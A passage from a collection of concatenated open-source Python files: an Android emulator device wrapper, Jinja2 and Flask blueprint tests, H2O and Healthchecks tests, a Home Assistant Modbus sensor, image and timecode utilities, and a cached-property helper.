'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'root@%s:%s' % (self._instance_ip, remote),
local,
]
status, _ = cmd_helper.GetCmdStatusAndOutput(cmd)
if status:
raise device_errors.AdbCommandFailedError(
cmd, 'File not reachable on host: %s' % local,
device_serial=str(self))
try:
adb_wrapper.VerifyLocalFileExists(local)
except (subprocess.CalledProcessError, IOError):
logging.exception('Error when pulling files from android instance.')
raise device_errors.AdbCommandFailedError(
cmd, 'File not reachable on host: %s' % local,
device_serial=str(self))
#override
def Install(self, apk_path, forward_lock=False, reinstall=False,
sd_card=False, **kwargs):
"""Installs an apk on the gce instance
Args:
apk_path: Host path to the APK file.
forward_lock: (optional) If set forward-locks the app.
reinstall: (optional) If set reinstalls the app, keeping its data.
sd_card: (optional) If set installs on the SD card.
"""
adb_wrapper.VerifyLocalFileExists(_SSH_KEY_FILE)
adb_wrapper.VerifyLocalFileExists(apk_path)
cmd = ['install']
if forward_lock:
cmd.append('-l')
if reinstall:
cmd.append('-r')
if sd_card:
cmd.append('-s')
self.Push(apk_path, '/data/local/tmp/tmp.apk')
cmd = ['pm'] + cmd
cmd.append('/data/local/tmp/tmp.apk')
output = self.Shell(' '.join(cmd))
self.Shell('rm /data/local/tmp/tmp.apk')
if 'Success' not in output:
raise device_errors.AdbCommandFailedError(
cmd, output, device_serial=self._device_serial)
#override
@property
def is_emulator(self):
return True
|
apache-2.0
|
JackieXie168/rethinkdb
|
test/common/http_support/jinja2/testsuite/debug.py
|
415
|
1935
|
# -*- coding: utf-8 -*-
"""
jinja2.testsuite.debug
~~~~~~~~~~~~~~~~~~~~~~
Tests the debug system.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import unittest
from jinja2.testsuite import JinjaTestCase, filesystem_loader
from jinja2 import Environment, TemplateSyntaxError
env = Environment(loader=filesystem_loader)
class DebugTestCase(JinjaTestCase):
def test_runtime_error(self):
def test():
tmpl.render(fail=lambda: 1 / 0)
tmpl = env.get_template('broken.html')
self.assert_traceback_matches(test, r'''
File ".*?broken.html", line 2, in (top-level template code|<module>)
\{\{ fail\(\) \}\}
File ".*?debug.pyc?", line \d+, in <lambda>
tmpl\.render\(fail=lambda: 1 / 0\)
ZeroDivisionError: (int(eger)? )?division (or modulo )?by zero
''')
def test_syntax_error(self):
# XXX: the .*? is necessary for python3 which does not hide
# some of the stack frames we don't want to show. Not sure
# what's up with that, but that is not that critical. Should
# be fixed though.
self.assert_traceback_matches(lambda: env.get_template('syntaxerror.html'), r'''(?sm)
File ".*?syntaxerror.html", line 4, in (template|<module>)
\{% endif %\}.*?
(jinja2\.exceptions\.)?TemplateSyntaxError: Encountered unknown tag 'endif'. Jinja was looking for the following tags: 'endfor' or 'else'. The innermost block that needs to be closed is 'for'.
''')
def test_regular_syntax_error(self):
def test():
raise TemplateSyntaxError('wtf', 42)
self.assert_traceback_matches(test, r'''
File ".*debug.pyc?", line \d+, in test
raise TemplateSyntaxError\('wtf', 42\)
(jinja2\.exceptions\.)?TemplateSyntaxError: wtf
line 42''')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DebugTestCase))
return suite
|
apache-2.0
|
XXLRay/libreshot
|
build/lib.linux-x86_64-2.7/libreshot/classes/timeline.py
|
2
|
1380
|
# LibreShot Video Editor is a program that creates, modifies, and edits video files.
# Copyright (C) 2009 Jonathan Thomas
#
# This file is part of LibreShot Video Editor (http://launchpad.net/openshot/).
#
# LibreShot Video Editor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# LibreShot Video Editor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with LibreShot Video Editor. If not, see <http://www.gnu.org/licenses/>.
class timeline:
"""This class contains methods to simply displaying time codes"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
def get_friendly_time(self, milli):
"""Convert milliseconds to a tuple of the common time"""
sec, milli = divmod(milli, 1000)
min, sec = divmod(sec, 60)
hour, min = divmod(min, 60)
day, hour = divmod(hour, 24)
week, day = divmod(day, 7)
return (week, day, hour, min, sec, int(milli))
|
gpl-3.0
|
vbelakov/h2o
|
py/testdir_single_jvm/test_exec2_cmp_many_cols.py
|
9
|
5275
|
import unittest, random, sys, time
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_exec as h2e
print "Many cols, compare two data frames using exec =="
def write_syn_dataset(csvPathname, rowCount, colCount, SEED):
# 8 random generatators, 1 per column
r1 = random.Random(SEED)
dsf = open(csvPathname, "w+")
for i in range(rowCount):
rowData = []
for j in range(colCount):
r = r1.randint(0,1)
rowData.append(r)
rowDataCsv = ",".join(map(str,rowData))
dsf.write(rowDataCsv + "\n")
dsf.close()
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init(1,java_heap_GB=14)
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_exec2_many_cols(self):
SYNDATASETS_DIR = h2o.make_syn_dir()
tryList = [
(10, 10, 'cA', 200, 200),
(10, 1000, 'cB', 200, 200),
(10, 1000, 'cB', 200, 200),
# we timeout/fail on 500k? stop at 200k
# (10, 500000, 'cC', 200, 200),
# (10, 1000000, 'cD', 200, 360),
# (10, 1100000, 'cE', 60, 100),
# (10, 1200000, 'cF', 60, 120),
]
# h2b.browseTheCloud()
for (rowCount, colCount, hex_key, timeoutSecs, timeoutSecs2) in tryList:
SEEDPERFILE = random.randint(0, sys.maxint)
csvFilename = 'syn_' + str(SEEDPERFILE) + "_" + str(rowCount) + 'x' + str(colCount) + '.csv'
csvPathname = SYNDATASETS_DIR + '/' + csvFilename
print "\nCreating random", csvPathname
write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE)
# import it N times and compare the N hex keys
REPEAT = 5
for i in range(REPEAT):
hex_key_i = hex_key + "_"+ str(i)
start = time.time()
parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key_i,
timeoutSecs=timeoutSecs, doSummary=False)
print "Parse:", parseResult['destination_key'], "took", time.time() - start, "seconds"
# We should be able to see the parse result?
start = time.time()
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], timeoutSecs=timeoutSecs2)
print "Inspect:", parseResult['destination_key'], "took", time.time() - start, "seconds"
h2o_cmd.infoFromInspect(inspect, csvPathname)
print "\n" + csvPathname, \
" numRows:", "{:,}".format(inspect['numRows']), \
" numCols:", "{:,}".format(inspect['numCols'])
# should match # of cols in header or ??
self.assertEqual(inspect['numCols'], colCount,
"parse created result with the wrong number of cols %s %s" % (inspect['numCols'], colCount))
self.assertEqual(inspect['numRows'], rowCount,
"parse created result with the wrong number of rows (header shouldn't count) %s %s" % \
(inspect['numRows'], rowCount))
# compare each to 0
for i in range(1,REPEAT):
hex_key_i = hex_key + "_" + str(i)
hex_key_0 = hex_key + "_0"
print "\nComparing %s to %s" % (hex_key_i, hex_key_0)
if 1==0:
execExpr = "%s[1,]+%s[1,]" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "%s[,1]+%s[,1]" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "%s+%s" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "%s!=%s" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "%s==%s" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "sum(%s==%s)" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "s=sum(%s==%s)" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "s=c(1); s=c(sum(%s==%s))" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "n=c(1); n=c(nrow(%s)*ncol(%s))" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "r=c(1); r=s==n"
resultExec, result, h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
print "result:", result
if __name__ == '__main__':
h2o.unit_main()
|
apache-2.0
|
iphoting/healthchecks
|
hc/front/tests/test_pause.py
|
2
|
2485
|
from datetime import timedelta as td
from django.utils.timezone import now
from hc.api.models import Check
from hc.test import BaseTestCase
class PauseTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self.check = Check.objects.create(project=self.project, status="up")
self.url = "/checks/%s/pause/" % self.check.code
self.redirect_url = "/checks/%s/details/" % self.check.code
def test_it_pauses(self):
self.client.login(username="alice@example.org", password="password")
r = self.client.post(self.url)
self.assertRedirects(r, self.redirect_url)
self.check.refresh_from_db()
self.assertEqual(self.check.status, "paused")
def test_it_rejects_get(self):
self.client.login(username="alice@example.org", password="password")
r = self.client.get(self.url)
self.assertEqual(r.status_code, 405)
def test_it_allows_cross_team_access(self):
self.client.login(username="bob@example.org", password="password")
r = self.client.post(self.url)
self.assertRedirects(r, self.redirect_url)
def test_it_clears_last_start_alert_after(self):
self.check.last_start = now()
self.check.alert_after = self.check.last_start + td(hours=1)
self.check.save()
self.client.login(username="alice@example.org", password="password")
self.client.post(self.url)
self.check.refresh_from_db()
self.assertEqual(self.check.last_start, None)
self.assertEqual(self.check.alert_after, None)
def test_it_does_not_redirect_ajax(self):
self.client.login(username="alice@example.org", password="password")
r = self.client.post(self.url, HTTP_X_REQUESTED_WITH="XMLHttpRequest")
self.assertEqual(r.status_code, 200)
def test_it_requires_rw_access(self):
self.bobs_membership.rw = False
self.bobs_membership.save()
self.client.login(username="bob@example.org", password="password")
r = self.client.post(self.url)
self.assertEqual(r.status_code, 403)
def test_it_clears_next_nag_date(self):
self.profile.nag_period = td(hours=1)
self.profile.next_nag_date = now() + td(minutes=30)
self.profile.save()
self.client.login(username="alice@example.org", password="password")
self.client.post(self.url)
self.profile.refresh_from_db()
self.assertIsNone(self.profile.next_nag_date)
|
bsd-3-clause
|
MartinHjelmare/home-assistant
|
homeassistant/components/modbus/binary_sensor.py
|
7
|
2062
|
"""Support for Modbus Coil sensors."""
import logging
import voluptuous as vol
from homeassistant.components.binary_sensor import BinarySensorDevice
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, CONF_SLAVE
from homeassistant.helpers import config_validation as cv
from . import CONF_HUB, DEFAULT_HUB, DOMAIN as MODBUS_DOMAIN
_LOGGER = logging.getLogger(__name__)
CONF_COIL = 'coil'
CONF_COILS = 'coils'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_COILS): [{
vol.Required(CONF_COIL): cv.positive_int,
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_HUB, default=DEFAULT_HUB): cv.string,
vol.Optional(CONF_SLAVE): cv.positive_int,
}]
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Modbus binary sensors."""
sensors = []
for coil in config.get(CONF_COILS):
hub = hass.data[MODBUS_DOMAIN][coil.get(CONF_HUB)]
sensors.append(ModbusCoilSensor(
hub, coil.get(CONF_NAME), coil.get(CONF_SLAVE),
coil.get(CONF_COIL)))
add_entities(sensors)
class ModbusCoilSensor(BinarySensorDevice):
"""Modbus coil sensor."""
def __init__(self, hub, name, slave, coil):
"""Initialize the Modbus coil sensor."""
self._hub = hub
self._name = name
self._slave = int(slave) if slave else None
self._coil = int(coil)
self._value = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the sensor."""
return self._value
def update(self):
"""Update the state of the sensor."""
result = self._hub.read_coils(self._slave, self._coil, 1)
try:
self._value = result.bits[0]
except AttributeError:
_LOGGER.error("No response from hub %s, slave %s, coil %s",
self._hub.name, self._slave, self._coil)
|
apache-2.0
|
campaul/photoshell
|
photoshell/image.py
|
3
|
1343
|
from gi.repository import GdkPixbuf
from gi.repository import Gtk
import wand.image
class Image(object):
def __init__(self, image_path, datetime):
self.image_path = image_path
self.datetime = datetime
self._width = None
self._height = None
def width(self):
if not self._width:
pass
return self._width
def height(self):
if not self._height:
pass
return self._height
def load_pixbuf(self, max_width=1280, max_height=1024):
loader = GdkPixbuf.PixbufLoader.new()
loader.write(open(self.image_path, 'rb').read())
loader.close()
# Get Image Data
with wand.image.Image(filename=self.image_path) as image:
width, height = image.size
scale = min(max_height / height, min(max_width / width, 1))
width = width * scale
height = height * scale
# Create Pixbuf
pixbuf = loader.get_pixbuf().scale_simple(
width, height, GdkPixbuf.InterpType.BILINEAR)
pixbuf = pixbuf.scale_simple(
width, height, GdkPixbuf.InterpType.BILINEAR)
return pixbuf
def load_preview(self, max_width=1280, max_height=1024):
return Gtk.Image.new_from_pixbuf(
self.load_pixbuf(max_width, max_height)
)
|
mit
|
Papa2k15/flask
|
tests/test_blueprints.py
|
143
|
18147
|
# -*- coding: utf-8 -*-
"""
tests.blueprints
~~~~~~~~~~~~~~~~
Blueprints (and currently modules)
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
import flask
from flask._compat import text_type
from werkzeug.http import parse_cache_control_header
from jinja2 import TemplateNotFound
def test_blueprint_specific_error_handling():
frontend = flask.Blueprint('frontend', __name__)
backend = flask.Blueprint('backend', __name__)
sideend = flask.Blueprint('sideend', __name__)
@frontend.errorhandler(403)
def frontend_forbidden(e):
return 'frontend says no', 403
@frontend.route('/frontend-no')
def frontend_no():
flask.abort(403)
@backend.errorhandler(403)
def backend_forbidden(e):
return 'backend says no', 403
@backend.route('/backend-no')
def backend_no():
flask.abort(403)
@sideend.route('/what-is-a-sideend')
def sideend_no():
flask.abort(403)
app = flask.Flask(__name__)
app.register_blueprint(frontend)
app.register_blueprint(backend)
app.register_blueprint(sideend)
@app.errorhandler(403)
def app_forbidden(e):
return 'application itself says no', 403
c = app.test_client()
assert c.get('/frontend-no').data == b'frontend says no'
assert c.get('/backend-no').data == b'backend says no'
assert c.get('/what-is-a-sideend').data == b'application itself says no'
def test_blueprint_specific_user_error_handling():
class MyDecoratorException(Exception):
pass
class MyFunctionException(Exception):
pass
blue = flask.Blueprint('blue', __name__)
@blue.errorhandler(MyDecoratorException)
def my_decorator_exception_handler(e):
assert isinstance(e, MyDecoratorException)
return 'boom'
def my_function_exception_handler(e):
assert isinstance(e, MyFunctionException)
return 'bam'
blue.register_error_handler(MyFunctionException, my_function_exception_handler)
@blue.route('/decorator')
def blue_deco_test():
raise MyDecoratorException()
@blue.route('/function')
def blue_func_test():
raise MyFunctionException()
app = flask.Flask(__name__)
app.register_blueprint(blue)
c = app.test_client()
assert c.get('/decorator').data == b'boom'
assert c.get('/function').data == b'bam'
def test_blueprint_url_definitions():
bp = flask.Blueprint('test', __name__)
@bp.route('/foo', defaults={'baz': 42})
def foo(bar, baz):
return '%s/%d' % (bar, baz)
@bp.route('/bar')
def bar(bar):
return text_type(bar)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/1', url_defaults={'bar': 23})
app.register_blueprint(bp, url_prefix='/2', url_defaults={'bar': 19})
c = app.test_client()
assert c.get('/1/foo').data == b'23/42'
assert c.get('/2/foo').data == b'19/42'
assert c.get('/1/bar').data == b'23'
assert c.get('/2/bar').data == b'19'
def test_blueprint_url_processors():
bp = flask.Blueprint('frontend', __name__, url_prefix='/<lang_code>')
@bp.url_defaults
def add_language_code(endpoint, values):
values.setdefault('lang_code', flask.g.lang_code)
@bp.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code')
@bp.route('/')
def index():
return flask.url_for('.about')
@bp.route('/about')
def about():
return flask.url_for('.index')
app = flask.Flask(__name__)
app.register_blueprint(bp)
c = app.test_client()
assert c.get('/de/').data == b'/de/about'
assert c.get('/de/about').data == b'/de/'
def test_templates_and_static(test_apps):
from blueprintapp import app
c = app.test_client()
rv = c.get('/')
assert rv.data == b'Hello from the Frontend'
rv = c.get('/admin/')
assert rv.data == b'Hello from the Admin'
rv = c.get('/admin/index2')
assert rv.data == b'Hello from the Admin'
rv = c.get('/admin/static/test.txt')
assert rv.data.strip() == b'Admin File'
rv.close()
rv = c.get('/admin/static/css/test.css')
assert rv.data.strip() == b'/* nested file */'
rv.close()
# try/finally, in case other tests use this app for Blueprint tests.
max_age_default = app.config['SEND_FILE_MAX_AGE_DEFAULT']
try:
expected_max_age = 3600
if app.config['SEND_FILE_MAX_AGE_DEFAULT'] == expected_max_age:
expected_max_age = 7200
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = expected_max_age
rv = c.get('/admin/static/css/test.css')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == expected_max_age
rv.close()
finally:
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = max_age_default
with app.test_request_context():
assert flask.url_for('admin.static', filename='test.txt') == '/admin/static/test.txt'
with app.test_request_context():
try:
flask.render_template('missing.html')
except TemplateNotFound as e:
assert e.name == 'missing.html'
else:
assert 0, 'expected exception'
with flask.Flask(__name__).test_request_context():
assert flask.render_template('nested/nested.txt') == 'I\'m nested'
def test_default_static_cache_timeout():
app = flask.Flask(__name__)
class MyBlueprint(flask.Blueprint):
def get_send_file_max_age(self, filename):
return 100
blueprint = MyBlueprint('blueprint', __name__, static_folder='static')
app.register_blueprint(blueprint)
# try/finally, in case other tests use this app for Blueprint tests.
max_age_default = app.config['SEND_FILE_MAX_AGE_DEFAULT']
try:
with app.test_request_context():
unexpected_max_age = 3600
if app.config['SEND_FILE_MAX_AGE_DEFAULT'] == unexpected_max_age:
unexpected_max_age = 7200
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = unexpected_max_age
rv = blueprint.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == 100
rv.close()
finally:
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = max_age_default
def test_templates_list(test_apps):
from blueprintapp import app
templates = sorted(app.jinja_env.list_templates())
assert templates == ['admin/index.html', 'frontend/index.html']
def test_dotted_names():
frontend = flask.Blueprint('myapp.frontend', __name__)
backend = flask.Blueprint('myapp.backend', __name__)
@frontend.route('/fe')
def frontend_index():
return flask.url_for('myapp.backend.backend_index')
@frontend.route('/fe2')
def frontend_page2():
return flask.url_for('.frontend_index')
@backend.route('/be')
def backend_index():
return flask.url_for('myapp.frontend.frontend_index')
app = flask.Flask(__name__)
app.register_blueprint(frontend)
app.register_blueprint(backend)
c = app.test_client()
assert c.get('/fe').data.strip() == b'/be'
assert c.get('/fe2').data.strip() == b'/fe'
assert c.get('/be').data.strip() == b'/fe'
def test_dotted_names_from_app():
app = flask.Flask(__name__)
app.testing = True
test = flask.Blueprint('test', __name__)
@app.route('/')
def app_index():
return flask.url_for('test.index')
@test.route('/test/')
def index():
return flask.url_for('app_index')
app.register_blueprint(test)
with app.test_client() as c:
rv = c.get('/')
assert rv.data == b'/test/'
def test_empty_url_defaults():
bp = flask.Blueprint('bp', __name__)
@bp.route('/', defaults={'page': 1})
@bp.route('/page/<int:page>')
def something(page):
return str(page)
app = flask.Flask(__name__)
app.register_blueprint(bp)
c = app.test_client()
assert c.get('/').data == b'1'
assert c.get('/page/2').data == b'2'
def test_route_decorator_custom_endpoint():
bp = flask.Blueprint('bp', __name__)
@bp.route('/foo')
def foo():
return flask.request.endpoint
@bp.route('/bar', endpoint='bar')
def foo_bar():
return flask.request.endpoint
@bp.route('/bar/123', endpoint='123')
def foo_bar_foo():
return flask.request.endpoint
@bp.route('/bar/foo')
def bar_foo():
return flask.request.endpoint
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.request.endpoint
c = app.test_client()
assert c.get('/').data == b'index'
assert c.get('/py/foo').data == b'bp.foo'
assert c.get('/py/bar').data == b'bp.bar'
assert c.get('/py/bar/123').data == b'bp.123'
assert c.get('/py/bar/foo').data == b'bp.bar_foo'
def test_route_decorator_custom_endpoint_with_dots():
bp = flask.Blueprint('bp', __name__)
@bp.route('/foo')
def foo():
return flask.request.endpoint
try:
@bp.route('/bar', endpoint='bar.bar')
def foo_bar():
return flask.request.endpoint
except AssertionError:
pass
else:
raise AssertionError('expected AssertionError not raised')
try:
@bp.route('/bar/123', endpoint='bar.123')
def foo_bar_foo():
return flask.request.endpoint
except AssertionError:
pass
else:
raise AssertionError('expected AssertionError not raised')
def foo_foo_foo():
pass
pytest.raises(
AssertionError,
lambda: bp.add_url_rule(
'/bar/123', endpoint='bar.123', view_func=foo_foo_foo
)
)
pytest.raises(
AssertionError,
bp.route('/bar/123', endpoint='bar.123'),
lambda: None
)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
c = app.test_client()
assert c.get('/py/foo').data == b'bp.foo'
# The rule's didn't actually made it through
rv = c.get('/py/bar')
assert rv.status_code == 404
rv = c.get('/py/bar/123')
assert rv.status_code == 404
def test_template_filter():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter()
def my_reverse(s):
return s[::-1]
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'my_reverse' in app.jinja_env.filters.keys()
assert app.jinja_env.filters['my_reverse'] == my_reverse
assert app.jinja_env.filters['my_reverse']('abcd') == 'dcba'
def test_add_template_filter():
bp = flask.Blueprint('bp', __name__)
def my_reverse(s):
return s[::-1]
bp.add_app_template_filter(my_reverse)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'my_reverse' in app.jinja_env.filters.keys()
assert app.jinja_env.filters['my_reverse'] == my_reverse
assert app.jinja_env.filters['my_reverse']('abcd') == 'dcba'
def test_template_filter_with_name():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter('strrev')
def my_reverse(s):
return s[::-1]
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'strrev' in app.jinja_env.filters.keys()
assert app.jinja_env.filters['strrev'] == my_reverse
assert app.jinja_env.filters['strrev']('abcd') == 'dcba'
def test_add_template_filter_with_name():
bp = flask.Blueprint('bp', __name__)
def my_reverse(s):
return s[::-1]
bp.add_app_template_filter(my_reverse, 'strrev')
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'strrev' in app.jinja_env.filters.keys()
assert app.jinja_env.filters['strrev'] == my_reverse
assert app.jinja_env.filters['strrev']('abcd') == 'dcba'
def test_template_filter_with_template():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter()
def super_reverse(s):
return s[::-1]
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_template_filter_after_route_with_template():
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter()
def super_reverse(s):
return s[::-1]
app.register_blueprint(bp, url_prefix='/py')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_add_template_filter_with_template():
bp = flask.Blueprint('bp', __name__)
def super_reverse(s):
return s[::-1]
bp.add_app_template_filter(super_reverse)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_template_filter_with_name_and_template():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter('super_reverse')
def my_reverse(s):
return s[::-1]
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_add_template_filter_with_name_and_template():
bp = flask.Blueprint('bp', __name__)
def my_reverse(s):
return s[::-1]
bp.add_app_template_filter(my_reverse, 'super_reverse')
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_template_test():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test()
def is_boolean(value):
return isinstance(value, bool)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'is_boolean' in app.jinja_env.tests.keys()
assert app.jinja_env.tests['is_boolean'] == is_boolean
assert app.jinja_env.tests['is_boolean'](False)
def test_add_template_test():
bp = flask.Blueprint('bp', __name__)
def is_boolean(value):
return isinstance(value, bool)
bp.add_app_template_test(is_boolean)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'is_boolean' in app.jinja_env.tests.keys()
assert app.jinja_env.tests['is_boolean'] == is_boolean
assert app.jinja_env.tests['is_boolean'](False)
def test_template_test_with_name():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test('boolean')
def is_boolean(value):
return isinstance(value, bool)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'boolean' in app.jinja_env.tests.keys()
assert app.jinja_env.tests['boolean'] == is_boolean
assert app.jinja_env.tests['boolean'](False)
def test_add_template_test_with_name():
bp = flask.Blueprint('bp', __name__)
def is_boolean(value):
return isinstance(value, bool)
bp.add_app_template_test(is_boolean, 'boolean')
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'boolean' in app.jinja_env.tests.keys()
assert app.jinja_env.tests['boolean'] == is_boolean
assert app.jinja_env.tests['boolean'](False)
def test_template_test_with_template():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test()
def boolean(value):
return isinstance(value, bool)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
assert b'Success!' in rv.data
def test_template_test_after_route_with_template():
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test()
def boolean(value):
return isinstance(value, bool)
app.register_blueprint(bp, url_prefix='/py')
rv = app.test_client().get('/')
assert b'Success!' in rv.data
def test_add_template_test_with_template():
bp = flask.Blueprint('bp', __name__)
def boolean(value):
return isinstance(value, bool)
bp.add_app_template_test(boolean)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
assert b'Success!' in rv.data
def test_template_test_with_name_and_template():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test('boolean')
def is_boolean(value):
return isinstance(value, bool)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
assert b'Success!' in rv.data
def test_add_template_test_with_name_and_template():
bp = flask.Blueprint('bp', __name__)
def is_boolean(value):
return isinstance(value, bool)
bp.add_app_template_test(is_boolean, 'boolean')
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
assert b'Success!' in rv.data
|
bsd-3-clause
|
cwisecarver/osf.io
|
osf/utils/caching.py
|
29
|
2114
|
"""
A property cache mechanism.
The cache is stored on the model as a protected attribute. Expensive
property lookups, such as database access, can therefore be sped up
when accessed multiple times in the same request.
The property can also be safely set and deleted without interference.
NOTE: Properties will *not* be cached if they return `None`. Use
`django.utils.functional.cached_property` for properties that
can return `None` and do not need a setter.
"""
from __future__ import unicode_literals
from functools import wraps
# from https://github.com/etianen/django-optimizations/blob/master/src/optimizations/propertycache.py
class _CachedProperty(property):
"""A property who's value is cached on the object."""
def __init__(self, fget, fset=None, fdel=None, doc=None):
"""Initializes the cached property."""
self._cache_name = '_{name}_cache'.format(
name=fget.__name__,
)
# Wrap the accessors.
fget = self._wrap_fget(fget)
if callable(fset):
fset = self._wrap_fset(fset)
if callable(fdel):
fdel = self._wrap_fdel(fdel)
# Create the property.
super(_CachedProperty, self).__init__(fget, fset, fdel, doc)
def _wrap_fget(self, fget):
@wraps(fget)
def do_fget(obj):
if hasattr(obj, self._cache_name):
return getattr(obj, self._cache_name)
# Generate the value to cache.
value = fget(obj)
if value:
setattr(obj, self._cache_name, value)
return value
return do_fget
def _wrap_fset(self, fset):
@wraps(fset)
def do_fset(obj, value):
fset(obj, value)
setattr(obj, self._cache_name, value)
return do_fset
def _wrap_fdel(self, fdel):
@wraps(fdel)
def do_fdel(obj):
fdel(obj)
delattr(obj, self._cache_name)
return do_fdel
# Public name for the cached property decorator. Using a class as a decorator just looks plain ugly. :P
cached_property = _CachedProperty
|
apache-2.0
|
myfreecomm/fixofx
|
test/ofxtools_qif_converter.py
|
1
|
9183
|
# Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
